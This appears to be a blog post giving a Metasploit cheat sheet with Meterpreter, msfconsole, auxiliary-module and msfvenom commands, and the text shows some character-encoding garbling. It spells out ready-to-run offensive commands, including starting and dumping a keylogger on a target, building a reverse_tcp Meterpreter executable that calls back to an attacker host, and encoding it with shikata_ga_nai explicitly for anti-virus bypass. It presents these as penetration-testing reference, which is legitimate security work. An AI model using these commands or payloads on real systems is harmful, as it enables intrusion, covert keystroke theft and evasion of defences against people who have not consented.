Metasploit cheat sheet –ย Metasploitย is an excellent pen-testing tool. We can use this in various transactions. We have discussed this before in numerous Metasploit hacking-related posts.
In this post, we will also look at the shutdown type command inย Metasploit.
Metasploitย cheat sheet
Networking commands
ipconfig:ย Show network interface configuration
portfwd:ย Forward packets
route:ย View/edit network routing table
Process handling commands
getpid:ย Display the process ID
getuid:ย Display the user ID
ps:ย Display running process
Kill:ย Stop and terminate a process
getprivs:ย Shows multiple privileges as possible
reg:ย Access target machine registry
Shell:ย Access target machine shell
execute:ย Run a specified
migrate:ย Move to a given destination process ID
Interface / output commands
enumdesktops –ย Show all available desktops
Getdesktop –ย Display current desktop
keyscan_ start – Start keylogger in the target machine
Keyscan_ stop –ย Stop keylogger in the target machine
set _desktop –ย Configure desktop
keyscan_dump –ย Dump keylogger content
Metasploit cheat sheet
Search for module:ย search [regex]
Specify and exploit to use:ย use exploit/[ExploitPath]
Specify a Payload to use:ย set PAYLOAD [PayloadPath]
Show options for the current modules:ย show options
Set options:ย set [Option] [Value]
Start exploit:ย exploit
Usefulย Auxiliary Modules
#Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
#DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
#FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
#Proxy Server:
msf > use auxiliary/server/socks4
msf > run
msfvenom commands
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with โ’-l payloadsโ to get a list of payloads.
msfvenom โp [PayloadPath] โf [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example :
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options (specified with โf) –help-formats โ List available output formats
exe โ Executable pl โ Perl rb โ Ruby raw โ Raw shellcode c โ C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example:
Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Meterpreter commands
? / help:ย Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo:ย Show the system name and OS type
shutdown / reboot:ย Self-explanatory
cd:ย Change directory
lcd:ย Change directory on local (attacker’s) machine
pwd / getwd:ย Display current working directory
ls:ย Show the contents of the directory
cat:ย Display the contents of a file on screen
download / upload:ย Move files to/from the target machine
mkdir / rmdir:ย Make / remove directory
edit:ย Open a file in the default editor (typically vi)
getpid:ย Display the process ID that Meterpreter is running inside.
getuid:ย Display the user ID that Meterpreter is running with.
ps:ย Display process list.
kill:ย Terminate a process given its process ID.
execute:ย Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate:ย Jump to a given destination process ID
Managing sessions
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit โj
List all current jobs (usually exploit listeners):
msf > jobs โl
Kill a job:
msf > jobs โk [JobID]
That’s it. I hope this post was helpful to you. If you have any doubts you can ask me through the command section.